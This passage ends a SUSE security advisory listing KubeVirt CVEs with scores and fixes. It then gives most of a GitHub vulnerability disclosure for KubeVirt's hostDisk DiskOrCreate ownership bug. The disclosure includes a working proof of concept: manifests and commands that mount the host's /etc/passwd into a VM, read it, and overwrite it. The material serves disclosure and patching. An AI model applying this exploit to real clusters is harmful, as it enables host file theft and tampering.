        "full_product_name": {
          "name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
          "product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64"
        },
        "product_reference": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
          "product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64"
        },
        "product_reference": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
          "product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64"
        },
        "product_reference": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
          "product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
        },
        "product_reference": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
        "relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-22872",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-22872"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-22872",
          "url": "https://www.suse.com/security/cve/CVE-2025-22872"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1241710 for CVE-2025-22872",
          "url": "https://bugzilla.suse.com/1241710"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-12-09T11:33:55Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2025-22872"
    },
    {
      "cve": "CVE-2025-64324",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-64324"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-64324",
          "url": "https://www.suse.com/security/cve/CVE-2025-64324"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1253748 for CVE-2025-64324",
          "url": "https://bugzilla.suse.com/1253748"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-12-09T11:33:55Z",
          "details": "important"
        }
      ],
      "title": "CVE-2025-64324"
    },
    {
      "cve": "CVE-2025-64432",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-64432"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-64432",
          "url": "https://www.suse.com/security/cve/CVE-2025-64432"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1253181 for CVE-2025-64432",
          "url": "https://bugzilla.suse.com/1253181"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 5.8,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
            "version": "3.1"
          },
          "products": [
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-12-09T11:33:55Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2025-64432"
    },
    {
      "cve": "CVE-2025-64433",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-64433"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-64433",
          "url": "https://www.suse.com/security/cve/CVE-2025-64433"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1253185 for CVE-2025-64433",
          "url": "https://bugzilla.suse.com/1253185"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-12-09T11:33:55Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2025-64433"
    },
    {
      "cve": "CVE-2025-64434",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-64434"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-64434",
          "url": "https://www.suse.com/security/cve/CVE-2025-64434"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1253186 for CVE-2025-64434",
          "url": "https://bugzilla.suse.com/1253186"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-12-09T11:33:55Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2025-64434"
    },
    {
      "cve": "CVE-2025-64437",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-64437"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
          "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-64437",
          "url": "https://www.suse.com/security/cve/CVE-2025-64437"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1253194 for CVE-2025-64437",
          "url": "https://bugzilla.suse.com/1253194"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 3.9,
            "baseSeverity": "LOW",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
            "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-12-09T11:33:55Z",
          "details": "low"
        }
      ],
      "title": "CVE-2025-64437"
    }
  ]
}

GHSA-46XP-26XH-HPQH

Vulnerability from github – Published: 2025-11-07 18:46 – Updated: 2025-11-27 08:53

Summary

KubeVirt Vulnerable to Arbitrary Host File Read and Write

Details

Summary

The hostDisk feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, the implementation of this feature and more specifically the DiskOrCreate option which creates a file if it doesn't exist, has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system.

Details

The hostDisk feature gate in KubeVirt allows mounting a QEMU RAW image directly from the host into a VM. While similar features, such as mounting disk images from a PVC, enforce ownership-based restrictions (e.g., only allowing files owned by specific UID, this mechanism can be subverted. For a RAW disk image to be readable by the QEMU process running within the virt-launcher pod, it must be owned by a user with UID 107. If this ownership check is considered a security barrier, it can be bypassed. In addition, the ownership of the host files mounted via this feature is changed to the user with UID 107.

The above is due to a logic bug in the code of the virt-handler component which prepares and sets the permissions of the volumes and data inside which are going to be mounted in the virt-launcher pod and consecutively consumed by the VM. It is triggered when one tries to mount a host file or directory using the DiskOrCreate option. The relevant code is as follows:

// pkg/host-disk/host-disk.go

func (hdc DiskImgCreator) Create(vmi *v1.VirtualMachineInstance) error {
    for _, volume := range vmi.Spec.Volumes {
        if hostDisk := volume.VolumeSource.HostDisk; shouldMountHostDisk(hostDisk) {
            if err := hdc.mountHostDiskAndSetOwnership(vmi, volume.Name, hostDisk); err != nil {
                return err
            }
        }
    }
    return nil
}

func shouldMountHostDisk(hostDisk *v1.HostDisk) bool {
    return hostDisk != nil && hostDisk.Type == v1.HostDiskExistsOrCreate && hostDisk.Path != ""
}

func (hdc *DiskImgCreator) mountHostDiskAndSetOwnership(vmi *v1.VirtualMachineInstance, volumeName string, hostDisk *v1.HostDisk) error {
    diskPath := GetMountedHostDiskPathFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName, hostDisk.Path)
    diskDir := GetMountedHostDiskDirFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName)
    fileExists, err := ephemeraldiskutils.FileExists(diskPath)
    if err != nil {
        return err
    }
    if !fileExists {
        if err := hdc.handleRequestedSizeAndCreateSparseRaw(vmi, diskDir, diskPath, hostDisk); err != nil {
            return err
        }
    }
    // Change file ownership to the qemu user.
    if err := ephemeraldiskutils.DefaultOwnershipManager.UnsafeSetFileOwnership(diskPath); err != nil {
        log.Log.Reason(err).Errorf("Couldn't set Ownership on %s: %v", diskPath, err)
        return err
    }
    return nil
}

The root cause lies in the fact that if the specified by the user file does not exist, it is created by the handleRequestedSizeAndCreateSparseRaw function. However, this function does not explicitly set file ownership or permissions. As a result, the logic in mountHostDiskAndSetOwnership proceeds to the branch marked with // Change file ownership to the qemu user, assuming ownership should be applied. This logic fails to account for the scenario where the file already exists and may be owned by a more privileged user. In such cases, changing file ownership without validating the file's origin introduces a security risk: it can unintentionally grant access to sensitive host files, compromising their integrity and confidentiality. This may also enable an External API Attacker to disrupt system availability.

PoC

To demonstrate this vulnerability, the hostDisk feature gate should be enabled when deploying the KubeVirt stack.

# kubevirt-cr.yaml
apiVersion: kubevirt.io/v1
kind: KubeVirt
metadata:
  name: kubevirt
  namespace: kubevirt
spec:
  certificateRotateStrategy: {}
  configuration:
    developerConfiguration:
      featureGates:
        -  HostDisk
  customizeComponents: {}
  imagePullPolicy: IfNotPresent
  workloadUpdateStrategy: {}

Initially, if one tries to create a VM and mount /etc/passwd from the host using the Disk option which assumes that the file already exists, the following error is returned:

# arbitrary-host-read-write.yaml
apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: arbitrary-host-read-write
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
        kubevirt.io/domain: arbitrary-host-read-write
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
            - name: host-disk
              disk:
                bus: virtio
          interfaces:
          - name: default
            masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
      - name: default
        pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=
        - name: host-disk
          hostDisk:
            path: /etc/passwd
            type: Disk

# Deploy the above VM manifest
operator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml
# Observe the deployment status
operator@minikube:~$ kubectl get vm
NAME                        AGE     STATUS             READY
arbitrary-host-read-write   7m55s   CrashLoopBackOff   False
# Inspect the reason for the `CrashLoopBackOff`
operator@minikube:~$ kubectl get vm arbitrary-host-read-write  -o jsonpath='{.status.conditions[3].message}'
server error. command SyncVMI failed: "LibvirtError(Code=1, Domain=10, Message='internal error: process exited while connecting to monitor: 2025-05-20T20:14:01.546609Z qemu-kvm: -blockdev {\"driver\":\"file\",\"filename\":\"/var/run/kubevirt-private/vmi-disks/host-disk/passwd\",\"aio\":\"native\",\"node-name\":\"libvirt-1-storage\",\"read-only\":false,\"discard\":\"unmap\",\"cache\":{\"direct\":true,\"no-flush\":false}}: Could not open '/var/run/kubevirt-private/vmi-disks/host-disk/passwd': Permission denied')"

The hosts's /etc/passwd file's owner and group are 0:0 (root:root) hence, when one tries to deploy the above VirtualMachine definition, it gets a PermissionDenied error because the file is not owned by the user with UID 107 (qemu):

# Inspect the ownership of the host's mounted `/etc/passwd` file within the `virt-launcher` pod responsible for the VM
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-host-read-write-tjjkt -- ls -al /var/run/kubevirt-private/vmi-disks/host-disk/passwd
-rw-r--r--. 1 root root 1276 Jan 13 17:10 /var/run/kubevirt-private/vmi-disks/host-disk/passwd

However, if one uses the DiskOrCreate option, the file's ownership is silently changed to 107:107 (qemu:qemu) before the VM is started which allows the latter to boot, and then read and modify it.

...
hostDisk:
            capacity: 1Gi
            path: /etc/passwd
            type: DiskOrCreate

# Apply the modified manifest
operator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml
# Observe the deployment status
operator@minikube::~$ kubectl get vm
NAME                        AGE     STATUS             READY
arbitrary-host-read-write   7m55s   Running   False
# Initiate a console connection to the running VM
operator@minikube: virtctl console arbitrary-host-read-write
...

# Within the VM arbitrary-host-read-write, inspect the present block devices and their contents
root@arbitrary-host-read-write:~$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
vda     253:0    0   44M  0 disk
|-vda1  253:1    0   35M  0 part /
`-vda15 253:15   0    8M  0 part
vdb     253:16   0    1M  0 disk
vdc     253:32   0  1.5K  0 disk
root@arbitrary-host-read-write:~$ cat /dev/vdc
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
# Write into the block device backed up by the host's `/etc/passwd` file
root@arbitrary-host-read-write:~$ echo "Quarkslab" | tee -a /dev/vdc

If one inspects the file content of the host's /etc/passwd file, they will see that it has changed alongside its ownership:

# Inspect the contents of the file
operator@minikube:~$ cat /etc/passwd
Quarkslab
:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
